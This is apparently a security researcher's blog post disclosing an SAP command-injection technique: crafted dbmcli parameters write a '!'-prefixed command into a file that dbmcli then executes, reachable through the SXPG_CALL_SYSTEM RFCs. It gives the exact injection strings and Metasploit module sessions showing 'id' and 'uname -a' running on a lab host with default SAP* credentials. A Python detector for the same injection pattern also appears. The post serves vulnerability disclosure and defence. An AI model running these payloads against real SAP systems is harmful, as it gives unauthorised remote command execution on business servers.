SAP Parameter Injection
on 3 September, 2012
To quote Homer J Simpson, “All this computer hacking is making me thirsty. I think I’ll order a Tab”.
Very apt words, as I've been busy authoring many SAP MSF modules that I intend to release over the coming months, coinciding with the delivery of my updated "SAP Slapping" materials at the Sec-T, T2 and DeepSec conferences. However, I've decided to release a subset today as a small taster of what is to come.
Context IS recently identified and reported a vulnerability within SAP's Host Control service. This vulnerability can be used to achieve remote unauthenticated arbitrary command execution on Windows SAP systems, and it is possible on systems that use SAP MaxDB as the supporting database. Exploiting it requires the submission of arbitrary parameters to the dbmcli executable, which is part of the SAP MaxDB installation.
The technique involves causing the executable to write attacker-controlled input to an attacker-controlled file. The executable is then used to read commands to execute from that same file. For example, passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.
-o /tmp/pwned.txt -n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
for database (no dbname):
unknown host pwnie
!id
(see /etc/hosts
If the file is then passed to the binary as illustrated in the command line below, the lines prefixed with an exclamation mark are executed as commands (in this case twice, since the string appears twice in the file).
-ic /tmp/pwned.txt
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXECUTE can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and the relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting shell metacharacters; on Linux they cannot, until now of course. By making use of the same technique that Context IS used to exploit the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
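As an added example (not part of the original post or of the Metasploit modules it describes), the check below flags SM69 additional-parameter strings that carry the dbmcli injection shape explained above: output redirected to a file (-o), commands read from a file (-ic), embedded newlines or tabs, and a "!" shell escape at the start of a line. The sample parameter strings are constructed; the benign one assumes the usual "-d <db> -u <user,pwd>" dbmcli form.

```python
import re
import shlex

# dbmcli options the post shows being abused: -o writes session output to a
# file, -ic reads commands from a file. The -n node name ends up echoed into
# the output file, which is how attacker text reaches the command file.
FILE_WRITE_FLAGS = {"-o"}
FILE_READ_FLAGS = {"-ic"}
# '!' at the start of the string, of a new line, or after a field separator.
SHELL_ESCAPE = re.compile(r"(^|[\r\n\t;])\s*!")


def flag_dbmcli_params(params: str) -> list:
    """Return findings for one dbmcli additional-parameter string.

    An empty list means nothing in the string matches the injection shape
    (file write, file read, control characters, or '!' shell escape).
    """
    findings = []
    # Control characters let one parameter string span several dbmcli lines,
    # which is what puts '!id' on its own line inside the output file.
    if any(c in params for c in "\r\n\t"):
        findings.append("control characters (newline/tab) in parameters")
    if SHELL_ESCAPE.search(params):
        findings.append("'!' shell escape at start of a line")
    try:
        tokens = shlex.split(params)
    except ValueError:  # unbalanced quotes: fall back to plain splitting
        tokens = params.split()
    for tok in tokens:
        if tok.lower() in FILE_WRITE_FLAGS:
            findings.append("-o: output redirected to a file")
        elif tok.lower() in FILE_READ_FLAGS:
            findings.append("-ic: commands read from a file")
    return findings


if __name__ == "__main__":
    # Constructed samples: a benign status query, then the two stages from the post.
    samples = [
        "-d MAXDB -u control,control db_state",
        "-o /tmp/pwned.txt -n pwnie\n!id\tfoo\n",
        "-ic /tmp/pwned.txt",
    ]
    for s in samples:
        print(repr(s), "->", flag_dbmcli_params(s) or "clean")
```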
I have crafted several Metasploit modules to demonstrate this vector; the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
CLIENT   001              yes       Client
CMD      id               yes       Command to run
OS       Linux            yes       Windows/Linux
PASS     06071992         yes       Password
Proxies                   no        Use a proxy chain
RHOSTS   172.16.252.150   yes       SAP ICM server address
RPORT    8042             yes       SAP ICM server port number
THREADS  1                yes       The number of concurrent threads
USER     SAP*             yes       Username
VHOST                     no        HTTP server virtual host
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================
Output
------
;!id
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================
Output
------
;!uname -a
Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector (port 3342), rather than via SOAP.
msf auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[SAP] Command Exec
==================
Output
------
>!id
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the meantime you can download the modules to try from here: